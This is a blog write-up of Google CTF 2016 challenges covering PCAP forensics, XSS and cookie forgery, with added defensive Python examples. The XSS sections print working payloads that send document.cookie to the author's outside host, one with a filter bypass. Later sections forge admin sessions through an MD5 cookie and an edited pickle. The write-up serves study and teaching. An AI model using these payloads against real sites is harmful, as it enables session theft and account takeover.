Google CTF 2016 - Some trivial challenges

Since I had a few hours to spare this weekend, I took a look at some of the trivial 25 and 50 point challenges that they offered. So here's a write-up of just that.

FOR50 - No Big Deal

Sometimes the answer is immediately obvious, sometimes it's obscured.

After opening the PCAP and checking the Protocol hierarchy, I just went and followed the TCP stream that was going on. Since it seemed to be some binary data, I extracted the data into a file and searched for interesting strings.

Protocol Hierarchy

TCP stream

One thing I usually do during CTFs is to encode the prefix of all flags in base64. In this CTF the prefix was 'CTF{', which is "Q1RGew==" in Base64. Only the first five characters, "Q1RGe", are fixed; the trailing "w==" would change depending on what follows the brace, so that is the part to grep for. Grepping for it yielded the flag.

$ strings -n 10 no-big-deal.txt | grep "Q1RGe" | perl -MMIME::Base64 -nle 'print decode_base64($_)'
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}
CTF{betterfs.than.yours}

flag: CTF{betterfs.than.yours}
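The grep above only catches a flag whose 'CTF{' happens to start on a 3-byte boundary of the base64 input; the same four bytes encode as different characters at the other two alignments. The following Python is an added example (mine, not from the write-up): it derives the stable pattern for each alignment and scans a raw dump, using a constructed sample stream in place of the challenge PCAP.

```python
import base64
import binascii
import re

# Runs of base64 alphabet characters (plus optional padding) inside raw bytes.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")

def b64_prefix_patterns(prefix: bytes):
    """Return [(shift, first_char, pattern)] for the three byte alignments.
    Base64 maps 3 bytes to 4 chars, so the prefix encodes differently at byte
    offset 0, 1 or 2 of a group; only chars whose 6 bits lie fully inside the
    prefix are fixed, the rest depend on neighbouring bytes and are dropped."""
    patterns = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + prefix).decode()
        first = -(-8 * shift // 6)                       # ceil(8*shift / 6)
        last = (8 * shift + 8 * len(prefix) - 6) // 6    # last fully covered char
        patterns.append((shift, first, enc[first:last + 1]))
    return patterns

def find_b64_flags(data: bytes, prefix: bytes = b"CTF{"):
    """Decode every base64 run in data that contains the prefix at any alignment."""
    flag_re = re.compile(re.escape(prefix) + rb"[^}]*\}")
    found = set()
    for run in B64_RUN.finditer(data):
        text = run.group()
        for shift, first, pat in b64_prefix_patterns(prefix):
            for m in re.finditer(re.escape(pat.encode()), text):
                start = m.start() - first        # back up to a 4-char group boundary
                if start < 0 or start % 4:
                    continue
                body = text[start:].rstrip(b"=")
                body += b"=" * (-len(body) % 4)  # re-pad after any truncation
                try:
                    raw = base64.b64decode(body, validate=True)
                except binascii.Error:
                    continue
                found.update(f.decode("ascii", "replace") for f in flag_re.findall(raw))
    return sorted(found)

# Constructed sample stream: three base64 blobs whose plaintext places the flag
# at offsets 0, 1 and 2 mod 3, separated by bytes outside the base64 alphabet.
SAMPLE = (b"\x00\x01" + base64.b64encode(b"CTF{betterfs.than.yours}\n") + b"\xff"
          + base64.b64encode(b"xCTF{offset_one}") + b"\x00"
          + base64.b64encode(b"yyCTF{offset_two} trailing") + b"\xfe")

if __name__ == "__main__":
    for flag in find_b64_flags(SAMPLE):
        print(flag)
```

Run against the challenge data, replace SAMPLE with the bytes of the extracted TCP stream; the three patterns it derives for 'CTF{' are "Q1RGe", "NURn" and "DVEZ7".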

FOR25 - In recorded conversation

Can you find the flag?

Using just Wireshark, we can find the flag split up in chunks...

Easy as A B C

flag: CTF{some_leaks_are_good_leaks_}

WEB25 - Wallowing Wallabies

Wallowing Wallabies provides enterprise contract management - we'd like to find out how easy it is to perform corporate espionage against them. Visit them here.

When we visit the website, we're presented with the following.

Homepage

As good practice, we start by looking for the robots.txt and .htaccess files. The robots.txt file is a hit:

User-agent: *
Disallow: /deep-blue-sea/
Disallow: /deep-blue-sea/team/
# Yes, these are alphabet puns :)
Disallow: /deep-blue-sea/team/characters
Disallow: /deep-blue-sea/team/paragraphs
Disallow: /deep-blue-sea/team/lines
Disallow: /deep-blue-sea/team/runes
Disallow: /deep-blue-sea/team/vendors

Visiting all of the URLs, only one works: the vendors page.

Vendors page

Since this page tells us that an admin will view the message, we know we'll have to steal something that the admin can see or has. For example: his cookies.

Using my standard XSS cookie stealer, I inject the following:

<script>image = new Image(); image.src='https://iaan.be/googlectf.php?boobz='+document.cookie;</script>

But it didn't work. :( So, I tried some other stuff and eventually got greeted with the following error message:

Handy error messages

So I changed my approach and put the script above in a JavaScript file.

Storing the code in a JS file

I then got a visit in my log file from the admin:

green-mountains=eyJub25jZSI6ImY3ZjJlNWJkOTQxMDM5Y2EiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MjAyMTY1Mn0=|1462021649|228a5e098df36848185d1269acff00de25965db2

Injecting the cookie and getting the flag:

Inject the cookie

I like cookies

flag: CTF{feeling_robbed_of_your_cookies}

WEB50 - Wallowing Wallabies II

In this phase, there's some blacklisting going on. Every "malicious" string is replaced by the string "ANTI*HACKER". Trying a few things, I noticed that script elements are not allowed and several events are also blacklisted. But I ended up with the following:

<input type="text" autofocus onfocus="image = new Image(); image.src = 'https://iaan.be/googlectf.php?boobz=sow'+document.cookie;" value="dikkenbal"/>

Notice the space between "src" and the equals sign: "src=" was blacklisted but "src =" is not. This gives us a new cookie:

green-mountains=eyJub25jZSI6IjUxNjgxYzFhZmNhNjUwNTAiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vY2hhcmFjdGVycy4qJCIsImV4cGlyeSI6MTQ2MjA0OTI3MH0=|1462049267|e6a525e5e1fb492b57245192e05d4a56c4aa05b1

Decoding it gives us the page we can access now:

$ echo "eyJub25jZSI6IjUxNjgxYzFhZmNhNjUwNTAiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vY2hhcmFjdGVycy4qJCIsImV4cGlyeSI6MTQ2MjA0OTI3MH0=" | base64 --decode
{"nonce":"51681c1afca65050","allowed":"^/deep-blue-sea/team/characters.*$","expiry":1462049270}

Visiting that page:

Flaggggg

flag: CTF{strict_contextual_autoescaping_to_solve_your_xss_woes}
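The lesson of both Wallabies levels, as an added example that is not part of the write-up: a deny-list filter of the kind described above, modelled on the observed rules (the list is my assumption, not the site's code), next to context-aware escaping. The payload is the one from the write-up, with the exfiltration host replaced by a placeholder.

```python
import html
import re

# Deny-list modelled on what the write-up observed (script elements, some event
# handlers and the literal "src=" get rewritten). An assumption, not the site's code.
BLACKLIST = ["<script", "</script", "src=", "onload", "onerror", "onclick", "onmouseover"]
REPLACEMENT = "ANTI*HACKER"

def blacklist_filter(user_input: str) -> str:
    """Rewrite known-bad substrings and pass everything else through unchanged."""
    for bad in BLACKLIST:
        user_input = re.sub(re.escape(bad), REPLACEMENT, user_input, flags=re.IGNORECASE)
    return user_input

def escape_for_html(user_input: str) -> str:
    """Encode every character that can open a tag or attribute in an HTML text or
    quoted-attribute context, so the input can only ever render as literal text."""
    return html.escape(user_input, quote=True)

def has_live_event_handler(rendered: str) -> bool:
    """Rough check for the demo: is there still an element with an on* attribute?"""
    return re.search(r"<\w+[^>]*\son\w+\s*=", rendered, re.IGNORECASE) is not None

# Payload from the write-up; the exfiltration host is replaced by a placeholder.
PAYLOAD = ('<input type="text" autofocus onfocus="image = new Image(); '
           "image.src = 'https://collector.example/log?c='+document.cookie;\" value=\"x\"/>")

def compare(user_input: str = PAYLOAD) -> dict:
    """Render the same input through both defences; True means the script survives."""
    return {"blacklist": has_live_event_handler(blacklist_filter(user_input)),
            "escaped": has_live_event_handler(escape_for_html(user_input))}

if __name__ == "__main__":
    print(blacklist_filter("<img src=x onerror=alert(1)>"))  # deny-list catches this one
    print(blacklist_filter(PAYLOAD))                        # ...but not "src =" with a space
    print(compare())
```

Escaping has to match the output context: html.escape is right for HTML text and quoted attribute values, but not for a JavaScript string or a URL, which is what the "contextual" in the flag refers to.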

WEB50 - Ernst Echidna

Can you hack this website? The robots.txt sure looks interesting.

Homepage

Checking the robots.txt file:

Disallow: /admin 

Not allowed access to admin page

But of course, we can't see anything. :(

So, let's register...

Registering...

but no content

Checking the cookies:

Cookies

Googling the MD5 gives us "huehue", so the cookie is just the MD5 of our username. Seems obvious to swap it for the MD5 of "admin"...

Great success

flag: CTF{renaming-a-bunch-of-levels-sure-is-annoying}

WEB50 - Spotted Quoll

This blog on Zombie research looks like it might be interesting - can you break into the /admin section?

Homepage

Entering the Admin section just gives us a slightly different URL but the same page.

different url

Let's look at the cookies:

Cookies

Pickle is of course a reference to Python serialisation. So let's store the base64 decoded version and repickle the file to include the user "admin".

$ python unpickle.py 
{'python': 'pickles', 'subtle': 'hint', 'user': None}

Ok, seems easy enough to make the user "admin":

import pickle

# obsoletePickle holds the base64-decoded cookie from the previous step
with open("obsoletePickle", "rb") as f:
    hmpf = pickle.load(f)
print(hmpf)
hmpf['user'] = 'admin'
# protocol 0 keeps the text-based pickle format the original cookie used
with open("notSoObsoletePickle", "wb") as f:
    pickle.dump(hmpf, f, protocol=0)
$ base64 notSoObsoletePickle
KGRwMApTJ3B5dGhvbicKcDEKUydwaWNrbGVzJwpwMgpzUydzdWJ0bGUnCnAzClMnaGludCcKcDQKc1MndXNlcicKcDUKUydhZG1pbicKcDYKcy4=

Injecting the new pickle into the cookie as we've done before:

burp

flag: CTF{but_wait,theres_more.if_you_call}
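Both Ernst Echidna (cookie = MD5 of the username) and Spotted Quoll (cookie = base64 of a pickle) keep the session state on the client with nothing that ties it to the server, so editing it is all it takes. As an added example, not from the write-up and using a constructed key: an HMAC-signed JSON cookie, which rejects the same edit-the-user trick.

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side key. The CTF cookies were bound to no secret at all,
# which is why replacing the user field was enough to become admin.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"

def _encode(state: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(state, sort_keys=True).encode()).decode()

def sign_cookie(state: dict, key: bytes = SECRET_KEY) -> str:
    """cookie = base64(json) | hex(HMAC-SHA256(key, base64(json)))"""
    body = _encode(state)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{tag}"

def verify_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the state dict only if the tag matches; the body is not decoded
    (let alone unpickled) before the constant-time comparison succeeds."""
    body, sep, tag = cookie.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except ValueError:          # bad padding or bad JSON behind a valid tag: reject
        return None

def edit_user(cookie: str, new_user: str) -> str:
    """The write-up's trick against the pickle cookie: rewrite the body, keep the rest."""
    body, _, tag = cookie.rpartition("|")
    state = json.loads(base64.urlsafe_b64decode(body))
    state["user"] = new_user
    return f"{_encode(state)}|{tag}"

if __name__ == "__main__":
    cookie = sign_cookie({"user": "huehue", "python": "pickles"})
    print(verify_cookie(cookie))                       # the original state comes back
    print(verify_cookie(edit_user(cookie, "admin")))   # None: the tag no longer matches
```

Without the key, a client can still read the state (it is only encoded, not encrypted), but it can no longer change it; a hash of the username, as in Ernst Echidna, is not a substitute for this because anyone can compute it.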

*****
Written by Adriaan Dens on 02 May 2016